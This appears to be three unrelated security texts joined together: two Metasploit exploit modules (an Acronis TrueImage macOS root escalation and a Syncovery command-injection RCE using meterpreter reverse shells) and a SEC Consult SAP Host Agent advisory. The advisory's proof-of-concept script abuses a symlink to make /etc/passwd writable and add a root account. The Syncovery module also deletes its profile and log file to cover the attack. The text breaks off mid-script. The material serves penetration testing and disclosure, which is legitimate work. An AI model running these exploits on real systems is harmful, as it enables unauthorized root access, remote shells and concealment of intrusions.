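##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Local
  Rank = ExcellentRanking

  include Msf::Post::File
  include Msf::Post::Common
  include Msf::Post::Process
  include Msf::Exploit::EXE
  include Msf::Exploit::FileDropper
  prepend Msf::Exploit::Remote::AutoCheck

  # Byte sequences baked into the pre-compiled exploit (acronis-exp.macho).
  # They are overwritten in place by #compiled_exp, so a replacement must
  # have exactly the same byte length (see #patch_placeholder!).
  PRECOMPILED_PAYLOAD_PLACEHOLDER = '/tmp/payload'.b.freeze
  PRECOMPILED_SHELL_PLACEHOLDER = '/bin/zsh'.b.freeze
  PRECOMPILED_PID_PLACEHOLDER = "\xEF\xBE\xAD\xDE".b.freeze

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Acronis TrueImage XPC Privilege Escalation',
        'Description' => %q{
          Acronis TrueImage versions 2019 update 1 through 2021 update 1
          are vulnerable to privilege escalation. The `com.acronis.trueimagehelper`
          helper tool does not perform any validation on connecting clients,
          which gives arbitrary clients the ability to execute functions provided
          by the helper tool with `root` privileges.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'Csaba Fitzl', # @theevilbit - Vulnerability Discovery
          'Shelby Pace' # Metasploit Module and Objective-c code
        ],
        'Platform' => [ 'osx' ],
        'Arch' => [ ARCH_X64 ],
        'SessionTypes' => [ 'shell', 'meterpreter' ],
        'Targets' => [[ 'Auto', {} ]],
        'Privileged' => true,
        'References' => [
          [ 'CVE', '2020-25736' ],
          [ 'URL', 'https://kb.acronis.com/content/68061' ],
          [ 'URL', 'https://attackerkb.com/topics/a1Yrvagxt5/cve-2020-25736' ]
        ],
        'DefaultOptions' => {
          'PAYLOAD' => 'osx/x64/meterpreter/reverse_tcp',
          'WfsDelay' => 15
        },
        'DisclosureDate' => '2020-11-11',
        'DefaultTarget' => 0,
        'Notes' => {
          'Stability' => [ CRASH_SAFE ],
          'Reliability' => [ REPEATABLE_SESSION ],
          'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ]
        }
      )
    )

    register_options([
      OptString.new('WRITABLE_DIR', [ true, 'Writable directory to write the payload to', '/tmp' ]),
      OptString.new('SHELL', [ true, 'Shell to use for executing payload', '/bin/zsh' ]),
      OptEnum.new('COMPILE', [ true, 'Compile exploit on target', 'Auto', [ 'Auto', 'True', 'False' ] ])
    ])
  end

  # Directory on the target where the payload and the exploit binary are dropped.
  def tmp_dir
    datastore['WRITABLE_DIR'].to_s
  end

  # Shell the exploit uses to launch the payload.
  def sys_shell
    datastore['SHELL'].to_s
  end

  # Raw value of the COMPILE option ('Auto', 'True' or 'False').
  def compile
    datastore['COMPILE']
  end

  # Decides whether the Objective-C exploit is built on the target.
  # 'Auto' probes for the Xcode command line tools with `xcode-select -p`,
  # whose failure output contains "error: unable" when none are installed.
  def compile_on_target?
    return false if compile == 'False'

    if compile == 'Auto'
      ret = cmd_exec('xcode-select -p')
      return false if ret.include?('error: unable')
    end

    true
  end

  # Random base name shared by the exploit source (.m) and its binary.
  def exp_file_name
    @exp_file_name ||= Rex::Text.rand_text_alpha(5..10)
  end

  # Looks for the privileged helper tool and, when the application bundle is
  # present, reads its CFBundleVersion to decide whether the build is in the
  # vulnerable range.
  def check
    helper_location = '/Library/PrivilegedHelperTools'
    helper_svc_names = [ 'com.acronis.trueimagehelper', 'com.acronis.helpertool' ]
    plist = '/Applications/Acronis True Image.app/Contents/Info.plist'

    unless helper_svc_names.any? { |svc_name| file?("#{helper_location}/#{svc_name}") }
      return CheckCode::Safe
    end

    return CheckCode::Detected('Service found, but cannot determine version via plist') unless file?(plist)

    plutil_cmd = "plutil -extract CFBundleVersion raw '#{plist}'"
    build_no = cmd_exec(plutil_cmd).to_s.strip
    return CheckCode::Detected('Could not retrieve build number from plist') if build_no.blank?

    # plutil prints an error message instead of a number when the key is
    # missing or this plutil does not understand `-extract ... raw`.
    # `to_i` would silently turn that into 0 and report the host as Safe,
    # so refuse to make a verdict on non-numeric output.
    unless build_no.match?(/\A\d+/)
      return CheckCode::Detected("Could not parse build number from plutil output: #{build_no}")
    end

    build_no = build_no.to_i
    vprint_status("Found build #{build_no}")
    return CheckCode::Appears('Vulnerable build found') if build_no > 14170 && build_no < 33610

    CheckCode::Safe('Acronis version found is not vulnerable')
  end

  # Drops the payload, obtains the exploit binary (compiled on the target or
  # pre-built and patched) and runs it. Every file written is registered for
  # cleanup as soon as it exists, so a failure later on does not leave it behind.
  def exploit
    # 7 characters: '/tmp/' + name is exactly as long as the '/tmp/payload'
    # placeholder that #compiled_exp overwrites in the pre-built binary.
    payload_name = Rex::Text.rand_text_alpha(7)
    @payload_path = "#{tmp_dir}/#{payload_name}"

    print_status("Attempting to write payload at #{@payload_path}")
    unless upload_and_chmodx(@payload_path, generate_payload_exe)
      fail_with(Failure::BadConfig, 'Failed to write payload. Consider changing WRITABLE_DIR option.')
    end
    register_file_for_cleanup(@payload_path)
    vprint_good("Successfully wrote payload at #{@payload_path}")

    @pid = get_valid_pid
    exp_bin_path = "#{tmp_dir}/#{exp_file_name}"

    if compile_on_target?
      exp_src = "#{exp_file_name}.m"
      exp_path = "#{tmp_dir}/#{exp_src}"
      compile_cmd = "gcc -framework Foundation #{exp_path} -o #{exp_bin_path}"

      unless write_file(exp_path, objective_c_code)
        fail_with(Failure::BadConfig, 'Failed to write Objective-C exploit to disk. WRITABLE_DIR may need to be changed')
      end
      register_files_for_cleanup(exp_path, exp_bin_path)

      ret = cmd_exec(compile_cmd)
      unless ret.blank?
        vprint_error("Compiler output: #{ret}")
        fail_with(Failure::UnexpectedReply, "Failed to compile #{exp_src}")
      end
      # Never execute something that was not actually produced.
      fail_with(Failure::UnexpectedReply, "Compiled exploit #{exp_bin_path} was not created") unless file?(exp_bin_path)

      print_status("Successfully compiled #{exp_src}...Now executing payload")
    else
      print_status("Using pre-compiled exploit #{exp_bin_path}")
      unless upload_and_chmodx(exp_bin_path, compiled_exp)
        fail_with(Failure::BadConfig, 'Failed to write compiled exploit. Consider changing WRITABLE_DIR option.')
      end

      register_file_for_cleanup(exp_bin_path)
    end

    cmd_exec(exp_bin_path)
  end

  # Renders the Objective-C exploit source from the ERB template shipped with
  # the module; the template sees this module's instance variables via binding.
  def objective_c_code
    file_contents = exploit_data('CVE-2020-25736', 'acronis-exp.erb')
    ERB.new(file_contents).result(binding)
  rescue Errno::ENOENT
    fail_with(Failure::NotFound, 'ERB payload file not found')
  end

  # Returns the pre-built Mach-O exploit with its embedded placeholders
  # replaced by the configured payload path, shell and PID.
  #
  # The placeholders sit inside the binary, so a replacement must have the
  # same byte length: a shorter or longer value would shift every byte that
  # follows it and corrupt the Mach-O. The previous gsub! did exactly that
  # whenever WRITABLE_DIR or SHELL differed in length from the defaults; the
  # module now fails with BadConfig and points at COMPILE=True instead.
  def compiled_exp
    compiled = exploit_data('CVE-2020-25736', 'acronis-exp.macho').b

    patch_placeholder!(compiled, PRECOMPILED_PAYLOAD_PLACEHOLDER, @payload_path, 'WRITABLE_DIR')
    patch_placeholder!(compiled, PRECOMPILED_SHELL_PLACEHOLDER, sys_shell, 'SHELL')
    # The PID slot is a 4-byte little-endian marker, so pack('V') always fits.
    patch_placeholder!(compiled, PRECOMPILED_PID_PLACEHOLDER, [@pid.to_i].pack('V'), 'PID')

    compiled
  end

  # Replaces every occurrence of `placeholder` in `blob` with `value`,
  # refusing any value whose byte length differs from the placeholder's.
  # `option_name` names the datastore option in the error message.
  def patch_placeholder!(blob, placeholder, value, option_name)
    value = value.to_s.b
    unless value.bytesize == placeholder.bytesize
      fail_with(
        Failure::BadConfig,
        "#{option_name} yields #{value.inspect} (#{value.bytesize} bytes) but the pre-compiled exploit " \
        "has a #{placeholder.bytesize}-byte slot; set COMPILE to True to build the exploit on the target"
      )
    end

    blob.gsub!(placeholder, value)
  end

  # Picks the PID of an arbitrary running process for the exploit, falling
  # back to '1' when no usable process list is available. Index 0 is skipped
  # as before (presumably the first entry of the listing); the slice is now
  # guarded because `rand(1...1)` returns nil and `procs[nil]` raised on a
  # single-entry listing.
  def get_valid_pid
    procs = get_processes || []
    return '1' if procs.length < 2

    rand_proc = procs[rand(1...procs.length)]
    pid = rand_proc['pid'].to_s
    pid.blank? ? '1' : pid
  end
end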
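##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'json'

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::FileDropper
  prepend Msf::Exploit::Remote::AutoCheck

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Syncovery For Linux Web-GUI Authenticated Remote Command Execution',
        'Description' => %q{
          This module exploits an authenticated command injection vulnerability in the Web GUI of Syncovery File Sync & Backup Software for Linux.
          Successful exploitation results in remote code execution under the context of the root user.

          Syncovery allows an authenticated user to create jobs, which are executed before/after a profile is run.
          Jobs can contain arbitrary system commands and will be executed as root.
          A valid username and password or a session token is needed to exploit the vulnerability.
          The profile and its log file will be deleted afterwards to disguise the attack.

          The vulnerability is known to work on Linux platforms. All Syncovery versions prior to v9.48j are vulnerable including all versions of branch 8.
        },
        'Author' => [ 'Jan Rude' ],
        'License' => MSF_LICENSE,
        'References' => [
          ['URL', 'https://www.mgm-sp.com/en/multiple-vulnerabilities-in-syncovery-for-linux/'],
          ['CVE', '2022-36534']
        ],
        'Platform' => 'unix',
        'Arch' => [ ARCH_CMD ],
        'Targets' => [
          ['Syncovery for Linux < 9.48j', {}]
        ],
        'Privileged' => true,
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'Reliability' => [REPEATABLE_SESSION],
          # A profile and its log file are written on the target (and removed
          # again in on_new_session), and every request, including the login
          # credentials the application takes in the query string, can end
          # up in the web server's access log.
          'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS]
        },
        'DisclosureDate' => '2022-09-06',
        'DefaultTarget' => 0,
        'DefaultOptions' => {
          'Payload' => 'cmd/unix/python/meterpreter/reverse_tcp'
        }
      )
    )

    register_options(
      [
        Opt::RPORT(8999), # Default is HTTP: 8999; HTTPS: 8943
        OptString.new('USERNAME', [true, 'The username to Syncovery (default: default)', 'default']),
        OptString.new('PASSWORD', [true, 'The password to Syncovery (default: pass)', 'pass']),
        OptString.new('TOKEN', [false, 'A valid session token', '']),
        OptString.new('TARGETURI', [true, 'The path to Syncovery', '/']),
      ]
    )
  end

  # Fingerprints the target via /get_global_variables. Only Linux builds are
  # affected. Versions below 9.48j are reported as Appears; a bare '9.48' is
  # special-cased because Rex::Version treats the lettered '9.48j' as a
  # pre-release of 9.48 and would otherwise rank 9.48 above it.
  def check
    res = send_request_cgi(
      'uri' => normalize_uri(target_uri.path, '/get_global_variables'),
      'method' => 'GET'
    )
    return Exploit::CheckCode::Unknown unless res && res.code == 200

    json_res = res.get_json_document
    # A 200 that does not carry the expected document tells us nothing;
    # do not report it as Safe.
    return Exploit::CheckCode::Unknown unless json_res.is_a?(Hash) && json_res.key?('isSyncoveryWindows')
    return Exploit::CheckCode::Safe unless json_res['isSyncoveryWindows'] == 'false'

    version = json_res['SyncoveryTitle']&.scan(/Syncovery\s([A-Za-z0-9.]+)/)&.flatten&.first || ''
    if version.empty?
      vprint_warning("#{peer} - Could not identify version")
      return Exploit::CheckCode::Detected
    end

    begin
      found = Rex::Version.new(version)
    rescue ArgumentError
      # The title regex can capture strings Rex::Version rejects (e.g. a trailing dot).
      vprint_warning("#{peer} - Could not parse version string '#{version}'")
      return Exploit::CheckCode::Detected
    end

    if found < Rex::Version.new('9.48j') || found == Rex::Version.new('9.48')
      vprint_good("#{peer} - Syncovery #{version}")
      Exploit::CheckCode::Appears
    else
      vprint_status("#{peer} - Syncovery #{version}")
      Exploit::CheckCode::Safe
    end
  end

  # Authenticates unless a TOKEN was supplied, creates a throw-away profile
  # whose "execute before" job is the payload, then runs that profile.
  def exploit
    @token = datastore['TOKEN']
    syncovery_login if @token.blank?

    @profile_name = Rex::Text.rand_text_alpha_lower(20)
    create_profile
    run_profile
  end

  # Logs in with USERNAME/PASSWORD and stores the session token in @token.
  # The application takes the credentials as GET parameters, so they travel
  # in the request line and are visible to anything that logs it.
  def syncovery_login
    res = send_request_cgi({
      'uri' => normalize_uri(target_uri.path, '/post_applogin.php'),
      'vars_get' => {
        'login' => datastore['USERNAME'].to_s,
        'password' => datastore['PASSWORD'].to_s
      },
      'method' => 'GET'
    })
    fail_with(Failure::UnexpectedReply, "#{peer} - Did not respond to authentication request") unless res

    # After login, the application should give us a new token
    # session_token is actually just base64(MM/dd/yyyy HH:mm:ss) at the time of the login
    @token = res.get_json_document['session_token']
    fail_with(Failure::NoAccess, "#{peer} - Invalid credentials!") if @token.blank?

    vprint_good("#{peer} - Login successful")
  end

  # Inserts a profile with /dev/null on both sides and the encoded payload
  # as its Job_ExecuteBefore command.
  def create_profile
    json_body = {
      'ProfileName' => @profile_name,
      'Action' => 'Insert',
      'FormName' => 'synapp_profile_editor_form',
      'token' => @token,
      'Name' => @profile_name,
      'LeftPath' => '/dev/null',
      'LeftPathDisplay' => '/dev/null',
      'RightPath' => '/dev/null',
      'RightPathDisplay' => '/dev/null',
      'Job_ExecuteBefore' => payload.encoded
    }
    res = send_request_cgi({
      'method' => 'POST',
      'uri' => normalize_uri(target_uri.path, '/post_profilesettings.php'),
      'headers' => {
        'X-Requested-With' => 'XMLHttpRequest',
        'Content-Type' => 'application/x-www-form-urlencoded; charset=UTF-8'
      },
      'data' => JSON.generate(json_body)
    })

    # `res` is nil when the connection fails; the old code dereferenced it
    # in the error message and raised NoMethodError instead of failing cleanly.
    unless res && res.code == 200
      fail_with(Failure::UnexpectedReply, "#{peer} - Error (response code: #{res&.code || 'no response'})")
    end

    body = res.body.to_s
    if body.include?('Session Expired')
      fail_with(Failure::UnexpectedReply, "#{peer} - Invalid token (Session Expired)")
    elsif body.include?('Inserted')
      vprint_good("#{peer} - Profile created")
    else
      fail_with(Failure::UnexpectedReply, "#{peer} - Error (#{body})")
    end
  end

  # Triggers the profile, which makes the server execute the job.
  def run_profile
    vprint_status("#{peer} - Running profile")
    json_body = {
      'ProfileName' => @profile_name,
      'token' => @token,
      'attended' => true
    }
    res = send_request_cgi({
      'method' => 'POST',
      'uri' => normalize_uri(target_uri.path, '/post_runprofile.php'),
      'data' => JSON.generate(json_body)
    })

    unless res && res.code == 200
      fail_with(Failure::UnexpectedReply, "#{peer} - Could not run profile (response code: #{res&.code || 'no response'})")
    end
    print_good("#{peer} - Exploit successfully executed")
  end

  # Removes the traces the exploit left behind: the profile itself and, when
  # it can be identified, the profile's log file. FileDropper's own cleanup
  # runs in super.
  def on_new_session(session)
    vprint_status("#{peer} - Trying to delete IOCs")
    delete_profile
    schedule_log_cleanup
    super
  end

  # Deletes the throw-away profile through the Web GUI.
  def delete_profile
    json_body = {
      'ProfileName' => @profile_name,
      'token' => @token
    }
    res = send_request_cgi({
      'method' => 'POST',
      'uri' => normalize_uri(target_uri.path, '/post_deleteprofile.php'),
      'data' => JSON.generate(json_body)
    })

    if res && res.code == 200 && res.body.to_s.include?('Deleted')
      vprint_good("#{peer} - Profile successfully deleted")
    else
      print_error("#{peer} - Could not delete profile (#{res ? res.body : 'no response'})")
    end
  end

  # Registers the profile's log file for deletion. Only a positively matched
  # file is touched: the previous behaviour of registering the whole LogPath
  # directory for recursive removal whenever the listing request failed would
  # wipe every Syncovery log on the host, far beyond the single log file the
  # module description promises to remove.
  def schedule_log_cleanup
    res = send_request_cgi(
      'method' => 'GET',
      'uri' => normalize_uri(target_uri.path, '/getprogram_settings.php'),
      'vars_get' => {
        'token' => @token
      }
    )
    log_path = res.get_json_document['LogPath'] if res && res.code == 200
    if log_path.blank?
      print_warning("#{peer} - Could not determine LogPath; leaving the log file in place")
      return
    end

    # Only the first page entry is requested; whether the new profile's log
    # is always listed first is not verified here.
    res = send_request_cgi({
      'method' => 'GET',
      'uri' => normalize_uri(target_uri.path, '/logfiles.json'),
      'vars_get' => {
        'pagenum' => 0,
        'pagesize' => 1
      },
      'headers' => {
        'token' => @token
      }
    })
    log_file = res.body.to_s[/#{Regexp.escape(@profile_name)}.*?\.log/] if res && res.code == 200
    if log_file.blank?
      print_warning("#{peer} - Could not identify the profile's log file; leaving #{log_path} untouched")
      return
    end

    register_file_for_cleanup("#{log_path}/#{log_file}")
  end
end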
<pre><code>SEC Consult Vulnerability Lab Security Advisory < 20221213-0 ><br />=======================================================================<br /> title: Privilege Escalation Vulnerabilities (UNIX Insecure File<br /> Handling)<br /> product: SAP® Host Agent (saposcol)<br /> vulnerable version: see section "Vulnerable / tested versions"<br /> fixed version: see SAP security note 3159736<br /> CVE number: CVE-2022-35295<br /> impact: high<br /> homepage: https://www.sap.com/about.html<br /> found: 2022-02-18<br /> by: Fabian Hagg (Office Vienna)<br /> SEC Consult Vulnerability Lab<br /><br /> An integrated part of SEC Consult, an Atos company<br /> Europe | Asia | North America<br /><br /> https://www.sec-consult.com<br /><br />=======================================================================<br /><br />Vendor description:<br />-------------------<br />"SAP® Host Agent is an agent that can accomplish several life-cycle<br />management tasks, such as operating system monitoring, database<br />monitoring, system instance control and provisioning."<br /><br />Source: https://help.sap.com/viewer/141cbf7f183242b0ad0964a5195b24e7/202110.000/en-US/48c6f9627a004da5e10000000a421937.html<br /><br /><br />Business recommendation:<br />------------------------<br />By exploiting the vulnerabilities documented in this advisory, a<br />local attacker may escalate privileges on UNIX systems to fully<br />compromise vulnerable servers with root privileges.<br /><br />SEC Consult recommends to implement security note 3159736 where the<br />documented issue is fixed according to the vendor. We advise installing<br />the corrections as a matter of priority to keep business-critical<br />data secured.<br /><br /><br />Vulnerability overview/description:<br />-----------------------------------<br />Multiple vulnerabilities were identified that could allow a local<br />attacker authenticated as <sid>adm to escalate privileges on SAP UNIX<br />systems. 
No additional user authentication is required to exploit<br />these issues. The vulnerabilities are due to the privileged saposcol<br />process generating files in its default working directory (/usr/sap/tmp;<br />defined by profile parameter DIR_PERF) owned by the <sid>adm user (sapsys<br />group), and following symbolic links (symlinks) when trying to open/create<br />these files. Note that in some environments the directory might not be<br />owned by the <sid>adm user account but be writable for all users of<br />group sapsys including <sid>adm.<br /><br />An attacker is able to spoof the symbolic links, thus traversing the<br />file system and gaining access to unintended resources. This could permit<br />an attacker to read/write/corrupt files owned by the root user account<br />leading to privilege escalation.<br /><br /><br />1) UNIX Symlink Following and Insecure File Permissions in Detailed<br /> Lock Logging Feature of saposcol<br /><br />The stand-alone saposcol binary available in UNIX systems at<br />/usr/sap/hostctrl/exe/saposcol provides a debugging feature called<br />"detailed lock logging". For this option to be activated, the user<br /><sid>adm can perform the following action:<br /><br />- Starting the stand-alone saposcol binary with command line argument<br /> StartLockLog (/usr/sap/hostctrl/exe/saposcol StartLockLog).<br /><br />Once executed, a special flag is set in shared memory that triggers<br />multiple running processes and services (sapstartsrv, saposcol) to<br />create a file called SaposcolMonAreaLocking.log in the default<br />working directory. This directory is writable by the user<br /><sid>adm (group sapsys). One of the processes trying to create the<br />file is the main saposcol service running in the context of the root<br />user account. 
It was observed that the file is created by the process<br />using the openat() syscall with flags O_WRONLY, O_CREAT and O_APPEND.<br /><br />-----------------------------------------------------------------------<br />root@sapsrv:~# ps -efw<br />root 1998 /usr/sap/hostctrl/exe/saposcol -l -w60 pf=/usr/sap/hostctrl/<br />exe/host_profile<br /><br /># Tracing the saposcol process with PID 1998<br />root@sapsrv:~# strace -f -e trace=openat,chmod,chown -p 1998 -q<br />[...]<br />openat(AT_FDCWD, "/usr/sap/tmp/SaposcolMonAreaLocking.log", O_WRONLY|<br />O_CREAT|O_APPEND, 0666) = 6<br />chmod("/usr/sap/tmp/SaposcolMonAreaLocking.log", 0666) = 0<br />-----------------------------------------------------------------------<br /><br />Since the openat() call does not have the O_EXCL flag set, it is not<br />ensured that the process actually creates the file. That is, if the<br />file under the given path already exists, the process opens<br />the existing file for appending data to it and changes its permissions<br />to world-readable/world-writable (666). Since the process, when<br />opening an existing file, does not check (e.g., by setting the<br />O_NOFOLLOW flag) whether it is a symbolic link that resolves to a<br />target outside of the intended directory, an attacker can cause the<br />process to operate on unauthorized files by placing a malicious symlink<br />before activating the detailed lock logging feature via the stand-alone<br />saposcol binary. Note that because openat() itself follows the link,<br />merely switching the later chmod() to fchmod() on the descriptor would<br />not help here: the open must refuse links (O_NOFOLLOW, or O_EXCL on a<br />fresh file), or the working directory must not be writable by<br />unprivileged users. This vulnerability may allow an attacker to gain read/<br />write access to arbitrary files owned by the root user account.<br /><br /><br />2) UNIX Symlink Following and Race Condition in Hardware Reporting<br /> Feature of saposcol<br /><br />The main saposcol service running in the context of the root user<br />account allows generating reports containing information about the<br />underlying operating system and hardware configuration. 
For these<br />reports to be generated, the user <sid>adm can perform different<br />actions:<br /><br />- Using function GetSAPOSColHWConf of the saphostctrl binary<br /> (/usr/sap/hostctrl/exe/saphostctrl -function GetSAPOSColHWConf<br /> [-format <tree|flat>]) that generates a SOAP request for the host<br /> agent service (SAPHostControl) on port 1128/1129. The request is<br /> forwarded by sapstartsrv to the saposcol service for processing.<br /> <br />- Manually crafting a SOAP request identical to the one generated by<br /> the saphostctrl binary and sending it to localhost on port 1128<br /> /1129 via the loopback interface (e.g., using curl). This request<br /> is forwarded by sapstartsrv to the saposcol service for processing.<br /> <br />- Using the dialog interface of the stand-alone saposcol binary<br /> (/usr/sap/hostctrl/exe/saposcol -d) and its "ask" feature (ask<br /> Hardware/ ask HardwareXML) that communicates with the saposcol<br /> service using shared memory segments.<br /><br />- Using transaction ST06 in the application layer (ABAP based<br /> instances only).<br /><br />When requested via the SOAP interface of SAPHostControl (sapstartsrv),<br />the privileged saposcol process tries to generate the file<br />hwconfig_<host> / hw_<host>.xml (depending on whether the XML output<br />format is queried) in its working directory. The process then<br />collects information about OS resources and writes this data to the given<br />file. Once saposcol finished its work, the SAPHostControl service opens<br />and reads the file before providing the results to the caller via SOAP<br />response. That is, the newly created file is handled as a shared<br />resource by both processes. It was observed that when creating a<br />malicious symlink before triggering the execution flow described above,<br />the saposcol service does not verify if the link points to a resource<br />outside of the intended directory. 
Therefore, the targeted file gets<br />truncated, and the collected OS information is written into it.<br />This could allow an attacker to corrupt files owned by the root<br />user account.<br /><br />Moreover, by looking at the sequence of system calls, it<br />was identified that this procedure also yields a race condition that<br />could be exploited to gain unauthorized read access to files without<br />corrupting them. The syscalls performed by the two processes, when the<br />hardware report is requested via the SOAP interface of SAPHostControl,<br />are shown in the following listing.<br /><br />-----------------------------------------------------------------------<br /># Triggering the execution flow via the saphostctrl binary<br />secadm@sapsrv:~$ /usr/sap/hostctrl/exe/saphostctrl -function<br />GetSAPOSColHWConf<br /><br /># Tracing the saposcol process with PID 1998<br />root@sapsrv:~# strace -f -e trace=openat,chmod,chown -p 1998 -q -o<br />strace.saposcol -T -tt<br /><br />root@sapsrv:~# cat strace.saposcol | grep "/usr/sap/tmp/hwconfig_sapsrv"<br />[...]<br />1998 01:06:18.370022 openat(AT_FDCWD,"/usr/sap/tmp/hwconfig_sapsrv",<br />O_WRONLY|O_CREAT|O_EXCL|O_TRUNC, 0664) = 6<br />1998 01:06:18.370473 chown("/usr/sap/tmp/hwconfig_sapsrv", -1, 460) = 0<br />1998 01:06:18.370581 chmod("/usr/sap/tmp/hwconfig_sapsrv", 0664) = 0<br />1998 01:06:35.231717 chown("/usr/sap/tmp/hwconfig_sapsrv", -1, 460) = 0<br />1998 01:06:35.231833 chmod("/usr/sap/tmp/hwconfig_sapsrv", 0640) = 0<br />[...]<br /><br /># Tracing the sapstartsrv SAPHostControl process with PID 1713<br />root@sapsrv:~# strace -f -e trace=open,openat,chmod,chown -p 1713 -q -o<br />strace.sapstartsrv -T -tt<br /><br />root@sapsrv:~# less strace.sapstartsrv | grep "/usr/sap/tmp/hwconfig_sapsrv"<br />[...]<br />1713 01:06:35.782818 openat(AT_FDCWD,"/usr/sap/tmp/hwconfig_sapsrv",<br /> O_RDONLY) = 20<br />[...]<br />-----------------------------------------------------------------------<br /><br />It can be seen that the saposcol service first requests a file<br />descriptor by creating the report file via the openat() syscall. The<br />file is made readable/writable (664) to all users of group sapsys by<br />means of the first series of chmod()/chown() syscalls. The process then<br />retrieves the OS information and writes the results into the report<br />file before a second series of chmod()/chown() syscalls ensures that<br />this file is made read-only (640) to users of group sapsys only. Note<br />that both series of permission changes are applied by path name rather<br />than to the already open descriptor (e.g., via fchmod()/fchown()), and<br />the program does not check whether the file under the given path has<br />changed since it was created in the first place. An attacker can<br />therefore attempt to place a malicious symlink in the window after the<br />saposcol process has created the report file and obtained a file<br />descriptor, but before the file permissions are changed by the second<br />series of chmod()/chown() syscalls.<br /><br />If an attacker manages to carefully choose the time period between<br />triggering the execution flow and replacing the newly created file<br />with a link to an otherwise inaccessible resource, this resource does<br />not get corrupted. Instead, the targeted file is made readable to all<br />users of group sapsys, and its content is returned by the SAPHostControl<br />process opening the file in read-only mode afterwards. This may allow<br />an attacker to gain read access to files owned by the root user account.<br /><br /><br />3) UNIX Symlink Following and Race Condition in System Log Feature of<br /> saposcol<br /><br />The main saposcol service running in the context of the root user<br />account allows generating reports containing information about<br />operating system logs. 
For these reports to be generated, the user<br /><sid>adm can perform the following action:<br /><br />- Using the dialog interface of the stand-alone saposcol binary<br /> (/usr/sap/hostctrl/exe/saposcol -d) and its "ask" feature (ask<br /> OsSysLog <number of lines>) that communicates with the main<br /> saposcol process using shared memory segments.<br /><br />- Using transaction ST06 in the application layer (ABAP based<br /> instances only).<br /> <br />It was observed that when creating the system log report file<br />ossyslog_<host> in its working directory, the saposcol process<br />appears to be vulnerable to the same issues as described in 2.<br /><br /><br />4) UNIX Symlink Following in Log File Creation of saposcol<br /><br />The main saposcol service running in the context of the root user<br />account writes log information to the files dev_coll and<br />dev_coll.tmp in its working directory. It was observed that when<br />creating these log files during startup, the saposcol process<br />resolves malicious symlinks which can be exploited to corrupt<br />arbitrary files owned by the root user account. For successful<br />exploitation, however, user interaction and a restart of the main<br />saposcol process is required. To provoke a restart, the <sid>adm<br />user can stop the running saposcol process by performing the<br />following action:<br /><br />- Using option -k of the stand-alone saposcol binary<br /> (/usr/sap/hostctrl/exe/saposcol -k) that communicates with the<br /> main saposcol process using shared memory segments.<br /><br /><br />5) UNIX Symlink Following in Shared Memory Dump File Creation of<br /> saposcol<br /><br />The main saposcol service running in the context of the root user<br />account writes the data in the shared memory segment to the file coll.put<br />in its working directory when being terminated. 
It was observed<br />that when creating this file, the saposcol process resolves malicious<br />symlinks which can be exploited to corrupt arbitrary files owned by<br />the root user account. To stop the running saposcol process and<br />trigger the execution flow, the <sid>adm user can perform the<br />following action:<br /><br />- Using option -k of the stand-alone saposcol binary<br /> (/usr/sap/hostctrl/exe/saposcol -k) that communicates with the<br /> main saposcol process using shared memory segments.<br /><br /><br />Proof of concept:<br />-----------------<br />Note that the following PoCs are for demonstration purposes only and<br />must not be executed in live environments.<br /><br /><br />1) UNIX Symlink Following and Insecure File Permissions in Detailed<br /> Lock Logging Feature of saposcol<br /><br />For demonstration purposes, the bash snippet saposcollpe shown in<br />the following listing can be executed when being authenticated to<br />the local system as <sid>adm.<br /><br />-----------------------------------------------------------------------<br />#!/bin/bash<br /><br />PASSWD="/etc/passwd"<br />USER=$1<br />PASS=$(openssl passwd -1 -salt $1 $2)<br /><br />echo "[i] Creating malicious symlink."<br />ln -sf $PASSWD /usr/sap/tmp/SaposcolMonAreaLocking.log;<br />echo "[i] Dropping dbg flag in shm via saposcol."<br />/usr/sap/hostctrl/exe/saposcol StartLockLog > /dev/null;<br />echo "[i] Waiting for permissions to be set..."<br />while true; do<br /> if [ -w $PASSWD ]<br /> then<br /> rm -f /usr/sap/tmp/SaposcolMonAreaLocking.log;<br /> /usr/sap/hostctrl/exe/saposcol StopLockLog > /dev/null;<br /> echo "[i] Success. 
/etc/passwd is now world-writable."<br /> echo "$USER:$PASS:0:0::/root:/bin/bash" >> /etc/passwd;<br /> echo "[i] New user" $USER "with UID 0 created."<br /> break<br /> fi<br />done<br />echo "[+] Done"<br />-----------------------------------------------------------------------<br /><br />This script exploits the vulnerability to create a new user (username<br />and password specified via command line args) holding root privileges.<br />Note that the script does not restore the original mode of /etc/passwd:<br />the chmod() performed by saposcol leaves the file world-writable (0666)<br />after the run, and the added UID 0 account persists, so in a real<br />assessment both must be reverted (e.g., chmod 644 /etc/passwd and<br />removal of the account) once the finding has been documented.<br /><br />-----------------------------------------------------------------------<br />secadm@sapsrv:~$ whoami<br />secadm<br /><br />secadm@sapsrv:~$ id<br />uid=1001(secadm) gid=493(sapsys) groups=493(sapsys),1001(sapinst)<br /><br />secadm@sapsrv:~$ ./saposcollpe sapmatt sappass<br />[i] Creating malicious symlink.<br />[i] Dropping dbg flag in shm via saposcol.<br />[i] Waiting for permissions to be set.<br />[i] Success. /etc/passwd is now world-writable.<br />[i] New user sapmatt with UID 0 created.<br />[+] Done<br /><br />secadm@sapsrv:~$ su - sapmatt<br />Password:<br />Directory: /root<br /><br />sapsrv:~# whoami<br />sapmatt<br /><br />sapsrv:~# id<br />uid=0(sapmatt) gid=0(root) groups=0(root)<br />-----------------------------------------------------------------------<br /><br /><br />2) UNIX Symlink Following and Race Condition in Hardware Reporting<br /><br />For demonstration purposes, the bash snippet saposcolrace shown in<br />the following listing can be executed when being authenticated to the<br />local system as <sid>adm.<br /><br />-----------------------------------------------------------------------<br />#!/bin/bash<br /><br />HOST=$(hostname)<br />TARGETFILE=$1<br />COUNTER=10<br />OUT="CONTINUE"<br /><br />ls -la $TARGETFILE<br />echo "[i] Racing..."<br />while [ -n "$OUT" ]<br />do<br /> echo 